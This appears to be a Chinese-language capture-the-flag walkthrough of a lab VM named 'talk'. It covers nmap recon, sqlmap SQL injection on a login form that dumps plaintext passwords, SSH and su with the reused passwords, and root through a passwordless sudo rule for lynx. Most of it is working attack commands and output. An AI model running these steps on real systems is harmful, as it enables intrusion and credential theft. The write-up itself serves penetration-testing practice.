信息搜集
主机扫描
arp-scan -l
端口扫描
┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.251.47
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-20 21:58 EDT
Nmap scan report for 192.168.251.47
Host is up (0.00034s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http nginx 1.14.2
MAC Address: 08:00:27:3A:33:93 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.56 seconds
80端口
进入页面后,是一个登录界面,第一时间想到的是sql注入,但不知道注入点所以我需要寻找一下注入点在哪里
我自己先注册了一个用户,然后发现类似于注入点的东西
┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.251.47/profile.php?userid=8 -dbs
WARNING] GET parameter 'userid' does not seem to be injectable
可惜不是注入点,于是试试登录界面
登录界面,抓包,保留为txt。发现存在注入点
- 查找库名
sqlmap -r post.txt -dbs -batch
available databases [4]:
[*] chat
[*] information_schema
[*] mysql
[*] performance_schema
- 查找表名
sqlmap -r post.txt -D chat -tables -batch
Database: chat
[3 tables]
+-----------+
| user |
| chat |
| chat_room |
+-----------+
- 查找列名
sqlmap -r post.txt -D chat -T user -columns -batch
Database: chat
Table: user
[6 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| email | varchar(255) |
| password | varchar(30) |
| phone | varchar(255) |
| userid | int(11) |
| username | varchar(30) |
| your_name | varchar(60) |
+-----------+--------------+
- 查找字段内容
sqlmap -r post.txt -D chat -T user -C username,password -dump -batch
Database: chat
Table: user
[8 entries]
+----------+-----------------+
| username | password |
+----------+-----------------+
| pao | pao |
| nona | myfriendtom |
| tina | davidwhatpass |
| jerry | thatsmynonapass |
| david | adrianthebest |
| 123456 | 123456 |
| aaa | aaa |
| 123 | 123 |
+----------+-----------------+
之后就结束了
获取shell
这里ssh登录需要注意的是,密码顺序是乱的,需要根据英语提示去输入密码
ssh adrian@192.168.251.47
password:adrianthebest
什么都没有
发现用户nona有user.txt
su nona
password:thatsmynonapass
获得nona的shell,获得user.txt,皆大欢喜
nona@talk:~$ cat user.txt
wordsarelies
提权
sudo -l发现一个无密码命令
nona@talk:~$ sudo -l
Matching Defaults entries for nona on talk:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User nona may run the following commands on talk:
(ALL : ALL) NOPASSWD: /usr/bin/lynx
直接提权
sudo -u root /usr/bin/lynx
root@talk:~# cat root.txt
talktomeroot
进入页面后,输入!
知识点
- sql注入的使用
- lynx提权
Comments | NOTHING